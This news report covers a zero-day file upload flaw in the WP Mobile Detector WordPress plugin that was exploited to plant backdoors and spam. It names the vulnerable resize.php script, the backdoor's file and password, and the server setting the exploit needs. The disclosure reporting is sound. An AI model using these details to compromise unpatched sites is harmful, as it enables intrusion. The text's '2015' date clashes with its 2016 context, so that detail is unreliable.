14 DAY TRIAL // Attackers have been using a newly discovered zero-day in the WP Mobile Detector plugin to upload backdoor scripts on WordPress sites and are currently employing it to upload adult-themed SEO spam on affected websites.
The WP Mobile Detector plugin is a simple tool that detects mobile users and allows webmasters to load a specific mobile-friendly theme based on the user's device.
Zero-day is in the plugin's image upload&resize script
The team at Plugin Vulnerabilities has discovered that the plugin features an arbitrary file upload vulnerability in the "/wp-content/plugins/wp-mobile-detector/resize.php" file.
This file handles image uploads, and according to the researchers who discovered the security bug, it lacks basic input filtering, allowing an attacker to pass a malicious file that gets uploaded to the plugin's /cache directory.
Using this vulnerability, attackers can upload PHP-based backdoors on WordPress sites, something that should have been almost impossible in 2016, after almost two decades of PHP coding and basic lessons in file upload security.
Zero-day exploited since May 26, 2015
The Plugin Vulnerabilities team says it discovered this backdoor on May 29, when it also notified the developer. Two days later, the team also alerted Automattic, who removed the plugin from the WordPress.org Plugin Directory.
At the time it was removed, the plugin had over 10,000 installs. In the meantime, the developer patched his plugin, which was reuploaded on the Plugin Directory, but now, there are only around 1,000 users running the plugin on their site, after webmasters rushed to uninstall the insecure extension.
Many did so because US security firm Sucuri revealed that its Web Application Firewall had detected attacks using this vulnerability since May 26, three days before the Plugin Vulnerabilities team discovered it, and five days before Automattic removed the plugin from the Plugin Directory.
Hackers uploaded a backdoor on the site with the password "dinamit"
Sucuri's Douglas Santos says the vulnerability is trivial to exploit and the backdoor script (css.php) works with the "dinamit" password, the Russian word for dynamite.
The WP Mobile Detector zero-day works regardless of what image processing library is installed on the server, so there's no connection to the ImageTragick vulnerability.
The Plugins Vulnerabilities team says the only condition is that the server has PHP's allow_url_fopen option enabled. The WP Mobile Detector plugin version 3.6 fixed the zero-day, but the plugin has already been updated to version 3.7.
